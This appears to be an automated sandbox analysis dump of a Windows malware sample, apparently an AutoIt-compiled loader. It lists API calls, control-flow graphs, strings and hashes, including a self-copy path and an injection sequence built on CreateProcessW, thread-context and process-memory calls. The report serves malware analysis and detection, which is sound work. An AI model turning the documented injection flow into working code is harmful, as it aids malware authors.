86809->86814 86813 425b7e 86815 40bc70 52 API calls 86814->86815 86816 40dd03 86815->86816 86823 40f210 86816->86823 86818 426a97 86820 40dd96 86820->86818 86821 40ddb7 86820->86821 86826 40dc00 52 API calls 2 library calls 86820->86826 86822 41130a 51 API calls __cinit 86821->86822 86822->86813 86827 40f250 RegOpenKeyExW 86823->86827 86825 40f230 86825->86820 86826->86820 86828 425e17 86827->86828 86829 40f275 RegQueryValueExW 86827->86829 86828->86825 86830 40f2c3 RegCloseKey 86829->86830 86831 40f298 86829->86831 86830->86825 86832 40f2a9 RegCloseKey 86831->86832 86833 425e1d 86831->86833 86832->86825

                                                                                                                                                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1762048999-758534266
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1997 401144-40114a 1995->1997 1998 40111b-40111e 1995->1998 1996->1995 1999 401182 1996->1999 2002 401184-40118e call 401250 1997->2002 2003 40114c-40114f 1997->2003 1998->1997 2001 401120-401126 1998->2001 2000 40112c-401141 DefWindowProcW 1999->2000 2001->2000 2005 42b038-42b03f 2001->2005 2008 401193-40119a 2002->2008 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2013 42b045-42b059 call 401000 call 40e0c0 2005->2013 2011 401219-40121f 2006->2011 2012 40115d 2006->2012 2009 4011a3-4011a9 2007->2009 2010 42afb4-42afc5 call 40f190 2007->2010 2009->2001 2014 4011af 2009->2014 2010->2008 2011->2001 2017 401225-42b06d call 468b0e 2011->2017 2015 401163-401166 2012->2015 2016 42b01d-42b024 2012->2016 2013->2000 2014->2001 2021 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2014->2021 2022 4011db-401202 SetTimer RegisterWindowMessageW 2014->2022 2024 42afe9-42b018 call 40f190 call 401a50 2015->2024 2025 40116c-401172 2015->2025 2016->2000 2023 42b02a-42b033 call 4370f4 2016->2023 2017->2008 2022->2008 2032 401204-401216 CreatePopupMenu 2022->2032 2023->2000 2024->2000 2025->2001 2034 401174-42afde call 45fd57 2025->2034 2034->2000 2045 42afe4 2034->2045 2045->2008
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04C0F618 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2065 4c0f618-4c0f6c6 call 4c0d008 2068 4c0f6cd-4c0f6f3 call 4c10528 CreateFileW 2065->2068 2071 4c0f6f5 2068->2071 2072 4c0f6fa-4c0f70a 2068->2072 2073 4c0f845-4c0f849 2071->2073 2079 4c0f711-4c0f72b VirtualAlloc 2072->2079 2080 4c0f70c 2072->2080 2074 4c0f88b-4c0f88e 2073->2074 2075 4c0f84b-4c0f84f 2073->2075 2081 4c0f891-4c0f898 2074->2081 2077 4c0f851-4c0f854 2075->2077 2078 4c0f85b-4c0f85f 2075->2078 2077->2078 2084 4c0f861-4c0f86b 2078->2084 2085 4c0f86f-4c0f873 2078->2085 2086 4c0f732-4c0f749 ReadFile 2079->2086 2087 4c0f72d 2079->2087 2080->2073 2082 4c0f89a-4c0f8a5 2081->2082 2083 4c0f8ed-4c0f902 2081->2083 2088 4c0f8a7 2082->2088 2089 4c0f8a9-4c0f8b5 2082->2089 2090 4c0f912-4c0f91a 2083->2090 2091 4c0f904-4c0f90f VirtualFree 2083->2091 2084->2085 2092 4c0f883 2085->2092 2093 4c0f875-4c0f87f 2085->2093 2094 4c0f750-4c0f790 VirtualAlloc 2086->2094 2095 4c0f74b 2086->2095 2087->2073 2088->2083 2098 4c0f8b7-4c0f8c7 2089->2098 2099 4c0f8c9-4c0f8d5 2089->2099 2091->2090 2092->2074 2093->2092 2096 4c0f792 2094->2096 2097 4c0f797-4c0f7b2 call 4c10778 2094->2097 2095->2073 2096->2073 2105 4c0f7bd-4c0f7c7 2097->2105 2101 4c0f8eb 2098->2101 2102 4c0f8e2-4c0f8e8 2099->2102 2103 4c0f8d7-4c0f8e0 2099->2103 2101->2081 2102->2101 2103->2101 2106 4c0f7c9-4c0f7f8 call 4c10778 2105->2106 2107 4c0f7fa-4c0f80e call 4c10588 2105->2107 2106->2105 2113 4c0f810 2107->2113 2114 4c0f812-4c0f816 2107->2114 2113->2073 2115 4c0f822-4c0f826 2114->2115 2116 4c0f818-4c0f81c CloseHandle 2114->2116 2117 4c0f836-4c0f83f 2115->2117 2118 4c0f828-4c0f833 VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04C0F6E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04C0F90F
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 204039940-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9a47e16b24932afb542f77eed4a787b9f17478810a29ac542000249f48b5e7b4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAA11B70E00209EBDB24CFA4C894BEEB7B6BF49304F248159E501BB2C0D7B5AA81DF55
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04C0F3B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 04C0F2A8: Sleep.KERNELBASE(000001F4), ref: 04C0F2B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04C0F4E9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFileSleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: QCTMDQBDDWA12LNO5EWW
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2694422964-2706631413
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8af22172c24b9f823577794356130d6f01fdd33e503172ee4b2c1517d50a8c95
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f07471ce2eb2a5c7165c4ae0c50f9212531d049c4b4162e9fc4e62d82f3e22cc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8af22172c24b9f823577794356130d6f01fdd33e503172ee4b2c1517d50a8c95
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C51A330D04248DBEF21DBA4D818BEEBB75AF18304F00419DE609BB2C0D7B95B44CBA9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04C0DAE8 Relevance: 7.8, APIs: 5, Instructions: 311COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5216dfe338735ab9014d0c4c9b9a4035d62afefa9461bcf916e1378df86e2fde
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a6637db5d9c0230c9037455d8c31c018747044eff602f3383a2065bc27d6e120
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5216dfe338735ab9014d0c4c9b9a4035d62afefa9461bcf916e1378df86e2fde
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21D11214A24258D6EB20DFB4D854BDEB232FF68700F109569E10DEB3E0E77A5E41CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04C0E2A8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 04C0EA63
                                                                                                                                                                                                                                                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04C0EAF9
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04C0EB1B
                                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 04C0EE24
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 572931308-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 618679925246de7c0f9e15fd74783325f85f89014cc46087d120f58bbffc6b06
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e36ff528f658988a5310635167fadcb8def9811ffaf23172f3f80768c2c894a9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 618679925246de7c0f9e15fd74783325f85f89014cc46087d120f58bbffc6b06
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7262FA30A542589BEB24CFA4C840BDEB376EF58700F1095A9D11DEB3E0E775AE81CB59
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\directory\name.exe, xrefs: 00410107
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strcat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1765576173-3037739059
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043214B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043215D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043216F
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
